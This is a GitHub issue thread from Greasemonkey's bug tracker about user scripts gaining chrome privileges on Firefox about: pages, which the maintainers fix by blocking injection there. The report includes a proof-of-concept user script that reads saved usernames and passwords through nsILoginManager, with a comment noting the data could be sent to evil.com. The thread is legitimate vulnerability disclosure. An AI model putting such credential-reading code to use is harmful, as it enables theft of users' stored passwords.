Skip to content
This repository

User scripts should not have chrome privilege in about: pages #1375

Closed
LouCypher opened this Issue July 13, 2011 · 5 comments

3 participants

Zulkarnain K. arantius Marti Martz
Zulkarnain K.

I found that user script run on these about pages has chrome previleges

about:
about:addons
about:config
about:crashes
about:memory
about:permissions
about:plugins
about:support

I tried the snippet on https://developer.mozilla.org/en/Using_nsILoginManager#Retrieving_a_password worked with user script run on the above pages.

Steps to reproduce:
1. Enable "greasemonkey.aboutIsGreaseable" in about:config (set it to true)
2. Install this script

// ==UserScript==
// @name            Retrieving passwords via about: pages
// @namespace       http://mozilla.status.net/loucypher
// @include         about:*
// ==/UserScript==

var hostname = 'https://www.google.com';
var formSubmitURL = 'https://www.google.com';  // not http://www.example.com/foo/auth.cgi
var httprealm = null;
var username, password;

try {
  var myLoginManager = Components.classes["@mozilla.org/login-manager;1"].
                        getService(Components.interfaces.nsILoginManager);
  var logins = myLoginManager.findLogins({}, hostname, formSubmitURL, httprealm);
  var info = "";
  for (var i = 0; i < logins.length; i++) {
    info += logins[i].username + "\n";
    info += logins[i].password + "\n\n";
  }
  //GM_log(info);
  alert(info); // show usernames and passwords for google.com
               // or send to evil.com via XHR (untested)
} catch(ex) {
  // This will only happen if there is no nsILoginManager component class
  //GM_log(ex);
}

Expected result:
User script should not have chrome privileges and should not have access to XPCOMs

Actual result:
Display usernames and passwords (could be worse)

Marti Martz
Martii commented July 13, 2011

Historical issue reference:
#1302

arantius
Collaborator

My initial guess is that it's just running with the principal of the page itself, which is chrome.

I'd be inclined to say that injecting into about: (besides blank) should be completely removed, rather than pref'ed like it is now. It's unsafe even without this bug.

arantius
Collaborator

I've spent over an hour on this, and been unable to come up with a fix (drop chrome privilege) that continues to allow the script to do anything (it just completely blocks access to the chrome-scope document).

Still thinking we should just drop this feature (injecting into about:s besides blank) altogether.

Marti Martz
Martii commented July 22, 2011

Still thinking we should just drop this feature (injecting into about:s besides blank) altogether.

In regards to security I am +1 for this. Moz and other addons are starting to create about: entries of their own and I would really rather not see user.js become a security threat to other add-ons including the Moz core. We could never really handle all of them especially if GM isn't aware of them. about:blank had some issues last time I tested it to with document.write but that was a while ago.

Zulkarnain K.

I agree, it should be removed.

arantius arantius closed this issue from a commit July 25, 2011
arantius Never run scripts in about: (except blank).
Security related.  Fixes #1375
80c62e8
arantius arantius closed this in 80c62e8 July 25, 2011
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Something went wrong with that request. Please try again.